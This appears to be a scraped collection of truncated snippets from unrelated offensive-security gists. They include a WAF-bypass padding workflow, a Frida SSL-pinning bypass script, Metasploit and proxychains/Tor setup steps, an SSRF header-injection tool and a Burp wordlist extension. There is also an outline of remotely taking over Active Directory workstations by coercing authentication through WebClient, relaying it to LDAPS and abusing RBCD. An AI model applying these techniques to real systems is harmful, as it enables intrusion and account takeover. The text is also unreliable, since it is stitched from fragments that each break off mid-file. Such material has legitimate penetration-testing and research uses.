{ | |
"description": "Bypass WAFs with 8KB Padding.", | |
"edition": 2, | |
"graph": { | |
"edges": [ | |
{ | |
"source": { | |
"exec_alias": "exec", | |
"node_id": 2 | |
}, |
console.log("[*] SSL Pinning Bypasses"); | |
console.log(`[*] Your frida version: ${Frida.version}`); | |
console.log(`[*] Your script runtime: ${Script.runtime}`); | |
/** | |
* by incogbyte | |
* Common functions | |
* thx apkunpacker, NVISOsecurity, TheDauntless | |
* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that. | |
* !!! THIS SCRIPT IS NOT A SILVER BULLET !! |
#!/bin/env python3 | |
import argparse | |
import datetime | |
import re | |
import sys | |
import uuid | |
############################################################################### | |
# Based off of Daniel Thatcher's guid tool |
This method installs Metasploit from the official OSX installer found at https://osx.metasploit.com/metasploitframework-latest.pkg
- Download the installer from https://osx.metasploit.com/metasploitframework-latest.pkg
- Run the installer.
- You should get it blocked from running.
- Go to OSX System Preferences -> Security & Privacy and tell OSX to "Open it anyway".
- The installer will start.
- At some point you will have to type your password to give the installer elevated privileges to continue.
{ | |
"builders": [], | |
"provisioners": [ | |
{ | |
"type": "file", | |
"source": "./configs", | |
"destination":"/tmp/configs" | |
}, | |
{ | |
"execute_command": "chmod +x {{ .Path }}; {{ .Vars }} sudo -E sh '{{ .Path }}'", |
# install | |
sudo apt-get install proxychains | |
sudo apt-get install tor | |
# then update the files /etc/proxychains.conf and /etc/tor/torrc with the given config | |
# restart tor server | |
sudo service restart tor |
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
''' | |
Based on the initial work of Digininja at https://github.com/digininja/CeWL. While CeWL is a script written | |
in Ruby that requires an independent crawl of a website in order to build a custom wordlist, Whey CeWLer | |
runs within Portswigger's Burp Suite and parses an already crawled sitemap to build a custom wordlist. It | |
does not have the meta data parsing capabilities that CeWL does, but it more than makes up for it in | |
convenience. | |
The name gets its origins from the CeWLer portion of the CO2 Burp extension by Jason Gillam, which is written | |
in Java and does something similar, but Whey CeWLer is a completely reimagined extension written in Python, | |
making it "way cooler". |
#https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/ssrf.py | |
import aiohttp | |
import asyncio | |
import urllib3 | |
import sys | |
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) | |
injectable_headers = [ |